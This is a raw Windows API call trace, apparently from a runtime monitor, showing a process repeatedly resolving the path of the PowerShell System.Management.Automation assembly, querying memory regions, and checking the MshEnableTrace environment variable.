	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0305.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0306.864] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.865] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.865] CoTaskMemFree (pv=0x246570) 
	[0306.867] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.878] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.878] CoTaskMemFree (pv=0x246570) 
	[0306.879] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.879] CoTaskMemFree (pv=0x246570) 
	[0306.880] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.880] CoTaskMemFree (pv=0x246570) 
	[0306.882] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.882] CoTaskMemFree (pv=0x246570) 
	[0306.886] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.886] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.886] CoTaskMemFree (pv=0x246570) 
	[0306.887] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0306.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.887] CoTaskMemFree (pv=0x246570) 
	[0306.891] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0306.891] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0308.471] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0308.474] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0308.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.474] CoTaskMemFree (pv=0x246570) 
	[0309.536] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2469b0
	[0309.538] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x246ac0
	[0310.718] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.279] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.281] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.282] VirtualQuery (in: lpAddress=0x1ca560, lpBuffer=0x1cb420, dwLength=0x30 | out: lpBuffer=0x1cb420*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.305] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.305] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.305] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.305] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0311.306] VirtualQuery (in: lpAddress=0x1cbb10, lpBuffer=0x1cc9d0, dwLength=0x30 | out: lpBuffer=0x1cc9d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
